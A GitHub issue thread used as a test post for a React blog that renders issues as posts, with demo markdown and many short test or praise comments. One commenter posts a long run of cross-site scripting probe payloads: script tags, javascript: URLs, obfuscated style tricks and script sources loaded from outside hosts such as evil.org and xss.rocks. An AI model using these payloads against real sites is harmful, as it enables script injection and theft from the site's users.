### ISSUE TITLE
React Blog Github (Test Issue 2)😀

### ISSUE THREAD

**Issue by saadpasta** [saadpasta/react-blog-github#2]
![Diya-logo (2)](https://user-images.githubusercontent.com/23307811/72970161-d4caf800-3de8-11ea-89b1-d0fdb9fafbcd.png)

## Live demo

Changes are automatically rendered as you type.

## Table of Contents

* Implements [GitHub Flavored Markdown](https://github.github.com/gfm/)
* Renders actual, "native" React DOM elements
* Allows you to escape or skip HTML (try toggling the checkboxes above)
* If you escape or skip the HTML, no `dangerouslySetInnerHTML` is used! Yay!

## HTML block below

<blockquote>
  This blockquote will change based on the HTML settings above.
</blockquote>

## How about some code?
```js
var React = require('react');
var Markdown = require('react-markdown');

React.render(
  <Markdown source="# Your markdown here" />,
  document.getElementById('content')
);
```

Pretty neat, eh?

## More info?

Read usage information and more on [GitHub](//github.com/rexxars/react-markdown)
These tell git to add all the work that you’ve done so far into one tidy package called a “commit.” Then, it names your commit to represent the changes that you’ve made. For my first commit, I always call it “initial commit.” However, if you just built your header HTML, you might call your commit “header HTML.” You should see something like this:

---------------

A component by [Saad Pasta](https://saadpasta.github.io/)

**Comment by tvaccari34** [comment]
That's really interesting.

Thanks for sharing @saadpasta

**Comment by JustinRWong** [comment]
Testiing to see how a comment renders :)

**Comment by JustinRWong** [comment]
Is it possible to comment directly on the blog, without comment? 

It seems like a blog post is an issue for the repo

**Comment by saadpasta** [comment]
@JustinRWong No, you can't do that right now. You have to comment on the issue on Github to view a comment on blog.

**Comment by saadpasta** [comment]
@JustinRWong  #57

**Comment by mikeodor** [comment]
wow

**Comment by Qudusayo** [comment]
Funny this  
Amazing Creator

**Comment by amirsohailgaddekar** [comment]
Great work

**Comment by fahimermo** [comment]
howw did youuu do thattttt? it's awesome

**Comment by hoangthienclub** [comment]
good

**Comment by ASMA-WEB** [comment]
fvxghuhyfc

**Comment by JayeshTiwari03** [comment]
Pretty neat

**Comment by am1no5** [comment]
ffffffffffff

**Comment by khanghldk** [comment]
It's awesome bro!

**Comment by choijooyoung** [comment]
ㅇㅇ

**Comment by xchsp** [comment]
发多少

**Comment by ozgursarioglan** [comment]
hi

**Comment by sjefvanleeuwen** [comment]
Nice.

**Comment by huertascc** [comment]
Bien, probemos con un comentario

**Comment by Taimoor0217** [comment]
<scrtip>alert(1)</script>

**Comment by reneesha** [comment]
test

**Comment by alchemistsaint** [comment]
test

**Comment by sunny775** [comment]
nice one bro

**Comment by suwkong** [comment]
kkkkk

**Comment by Rahul5733** [comment]
awesome idea man

**Comment by xenomagpie** [comment]
ttttttest

**Comment by FeverChen** [comment]
xxxx

**Comment by RasenGUY** [comment]
testing

**Comment by siang720** [comment]
test

**Comment by zorancevriz** [comment]
fergerg

**Comment by Taimoor0217** [comment]
<A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org</A>

**Comment by Taimoor0217** [comment]
</p>
<BASE HREF="javascript:alert('XSS');//">

**Comment by Taimoor0217** [comment]
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

**Comment by Taimoor0217** [comment]
</p>
<script>alert(1)</script>
<A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://xss.rocks/xss.js'></SCRIPT>"> Go to trusted.org</A> 
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<<SCRIPT>alert("XSS");//\<</SCRIPT>
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
<SCRIPT SRC=//xss.rocks/.j>
<IMG SRC="`('XSS')"`
<iframe src=http://xss.rocks/scriptlet.html <
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
¼script¾alert(¢XSS¢)¼/script¾
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <STYLE type="text/css">BODY{background:url("<javascript:alert>('XSS')")}</STYLE>
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<BASE HREF="javascript:alert('XSS');//">
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

**Comment by Taimoor0217** [comment]
</p>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov
L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5
L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyBURVNU
Iik7PC9zY3JpcHQ+PC9zdmc+" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

**Comment by sudovazid** [comment]
testing

**Comment by pettrushkov** [comment]
tttttttt

**Comment by ColSanders-a11y** [comment]
Testing. Very nice!

**Comment by Joepolymath** [comment]
Wowwwwoooo

**Comment by Erasable-Mak** [comment]
nice :)

**Comment by kevinHernandez05** [comment]
This is super nice!

**Comment by olabiranj** [comment]
Awesome 👍

**Comment by Hasibul10884** [comment]
Best.

**Comment by vldcreation** [comment]
Test

**Comment by ShuraimHassan** [comment]
how did you do this?

**Comment by aroyan** [comment]
This is so cool

**Comment by Milan-960** [comment]
wow this is cool!

**Comment by Hasibul10884** [comment]
good

**Comment by thisisazeez** [comment]
Great stuffs

**Comment by MerlinOfCode** [comment]
I'm not going to lie.  This is awesome.

**Comment by pettrushkov** [comment]
чччччч

**Comment by Divianshu7** [comment]
testing

**Comment by cophmat** [comment]
testing

**Comment by rimmelasghar** [comment]
still testing in 2023

**Comment by saadpasta** [comment]
Comment from IRL DUBAI 2023 Buildspace

**Comment by JAKimball** [comment]
Just to see how this works...
